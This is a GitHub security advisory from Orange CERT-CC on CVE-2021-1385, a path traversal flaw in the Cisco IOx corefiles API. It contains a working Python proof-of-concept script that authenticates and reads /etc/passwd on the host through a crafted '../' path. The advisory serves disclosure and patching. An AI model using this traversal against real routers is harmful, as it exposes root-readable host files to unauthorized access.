Skip to content

Cisco IOx - Application Environment Path Traversal Vulnerability (CVE-2021-1385)

Moderate
orange-cert-cc published GHSA-hhfw-6cm2-v3w5 Nov 16, 2021

Package

IOx (Cisco)

Affected versions

16.3.1
17.3.2

Patched versions

16.6.9
17.3.3

Description

Overview

IOx gives the ability to host containers on Cisco routers. Once enabled the router provides an API. This API allows to install, activate and start containers.
core_dir is a directory that can be used by both the API and the container itself.

The API that allows to get these files is vulnerable to path traversal allowing to read files on the host (as root).
Also the creation of symlink from the container in this directory is wrongly solved by the API on the host (same issue as #3).

Impact

This results in arbitrary read with root privileges on the host filesystem.

Detail

The corefiles API is using getCoreFile for path resolution.
It gets the directory on the host and calculate the path depending on core_filename provided by the user.

A regular expression prevents the user to provide a core_filename not starting with a word or a space.

But if the attacker can create a directory in its core_dir directory:

[root@guestshell guesshell]# cd /local/local1/core_dir/
[root@guestshell core_dir]# mkdir test

Then a valid path such as test/../../../../../<path> can be provided by the user.

Proof of Concept

Here is a python script that allows to download files on the host. It requires the existence of directory /local/local1/core_dir/test on the container.

import requests
import base64

# Please replace it with valid login and password
pwd=base64.b64encode(b'<REDACTED>:<REDACTED>')
h = {'Authorization': b'Basic ' + pwd}
r=requests.post('https://192.168.1.39/iox/api/v2/hosting/tokenservice', headers=h, verify=False)
token=r.json()['token']['id']
headers = {
           'X-Token-Id': token
}
r=requests.get('https://192.168.1.39/iox/api/v2/hosting/apps/guestshell/corefiles?corefile=test/../../../../../../../../../etc/passwd',headers=headers, verify=False)
res = r.text
print("File Content:\n%s"%res)

Solution

Security patch

Cisco fixed this vulnerability from:

  • 17.3(2.5) and later
  • 17.3.3 and later
  • 17.5(0.144) and later
  • 17.5.1 and later
  • 17.6.(0.17) and later
  • 17.6.1 and later

Workaround

There are no workarounds that address this vulnerability.

References

https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iox-pt-hWGcPf7g
https://nvd.nist.gov/vuln/detail/CVE-2021-1385

Credits

Orange CERT-CC
Cyrille CHATRAS at Orange group

Timeline

Date reported: November 27, 2020
Date fixed: March 24, 2021

Severity

Moderate

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
High
User interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
None

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N

CVE ID

CVE-2021-1385

Weaknesses